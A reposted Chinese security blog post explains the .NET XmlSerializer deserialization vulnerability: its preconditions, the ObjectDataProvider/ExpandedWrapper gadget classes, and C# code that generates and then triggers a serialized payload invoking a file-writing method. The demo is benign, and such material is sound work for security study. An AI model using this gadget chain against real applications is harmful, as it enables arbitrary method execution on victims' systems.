.Net反序列化漏洞之XmlSerializer

最新推荐文章于 2023-11-21 13:13:22 发布
最新推荐文章于 2023-11-21 13:13:22 发布
阅读量446 收藏
点赞数
原文链接:http://blog.51cto.com/duallay/2045651
版权

条件:

  1. 初始化对象时,类型可控:new XmlSerializer(type可控)
  2. 反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)

两个关键类:ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成:

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload:

        public static void deserializeObjectWithXmlSer()
        {
            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
            ser.Deserialize(fi);
            fi.Close();
        }

转载于:https://blog.51cto.com/duallay/2045651

weixin_33834628
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XML与JSON之间转换--XMLSerializer
08-28
XML与JSON之间转换
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
XmlSerializer反序列化漏洞
UKK
06-20 592
XmlSerializer反序列化漏洞 http://www.ifind.cc/view/234
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 705
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
.NET反序列化利用链入门——XmlSerializer
小王的储物间
03-15 249
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Java反序列化漏洞介绍书籍
08-17
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在Java应用程序中。反序列化是将已序列化的对象数据转换回其原始对象状态的过程。当这个过程处理不当时,恶意用户可以利用这些漏洞来执行任意代码,从而导致...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
.NET 高级代码审计(第一课)XmlSerializer 反序列漏洞
03-07
.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据 映射为 .NET 对象。XmlSerializer 类在程序中通过单个 API 调用来执行 XML 文档和对 象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人 员使用 Type 类的静态方法获取外界数据,并调用 Deserialize 反序列化 xml 数据就会 触发反序列化漏洞攻击(例如 DotNetNuke 任意代码执行漏洞 CVE-2017-9822),本 文笔者从原理和代码审计的视角做了相关脑图介绍和复现。
.NET高级代码审计(第一课)XmlSerializer反序列化漏洞
weixin_33825683的博客
03-09 181
0X00 前言 在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反序列化xml数据就会触...
XmlSerializer .NET 序列化、反序列化
weixin_34281537的博客
05-22 118
序列化对象 要序列化对象,首先创建要序列化的对象并设置其公共属性和字段。为此,您必须确定要将XML流存储的传输格式,作为流或文件。 例如,如果XML流必须以永久形式保存,则创建一个FileStream对象。 序列化对象 创建对象并设置其公共字段和属性。 构造一个XmlSerializer的使用对象的类型。有关更多信息,请参阅XmlSerializer...
学习笔记-.net安全之XmlSerializer反序列化
人饭子的博客
11-07 808
0x00 简介 反序列化学习主要用到如下资料: 1..NET反序列化payload生成工具ysoserial.net。 2.attacking-net-serialization其中列举了多种反序列化漏洞。 3.BH_US_12_Forshaw_Are_You_My_Type_WP.pdf 0x01 XmlSerializer序列化 System.Xml.Serialization.XmlS...
.net 获取xml 属性值_【硬货分享】.NET高级代码审计:DataContractSerializer反序列化漏洞...
weixin_33536190的博客
12-10 474
作者:Ivan1ee@360云影实验室0X00 前言DataContractSerializer用于序列化和反序列化Windows Communication Foundation (WCF) 消息中发送的数据,用于把CLR数据类型序列化成XML流,它位于命名空间System.Runtime.Serialization,继承于System.Runtime.Serialization.XmlObj...
XmlSerializer
wfy6617的博客
03-03 221
https://msdn.microsoft.com/zh-cn/library/system.xml.serialization.xmlserializer(VS.80).aspx
.NET反序列化利用链萌新入门——XmlSerializer
最新发布
Innocence_0的博客
11-21 209
1.如果new XmlSerializer(type)的type可控,即可能存在反序列化漏洞。2.通过XamlReader.Parse()绕过Process无法序列化的问题。在其他攻击链中还会用到。
.NET Remoting反序列化漏洞分析及代码审计
本文主要介绍了.NET Remoting反序列化漏洞,特别是通过使用SoapServerFormatterSinkProvider类来实现远程代码执行攻击的漏洞。文章首先介绍了最近公布的.NET Remoting反序列化安全风险,即当服务端使用了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值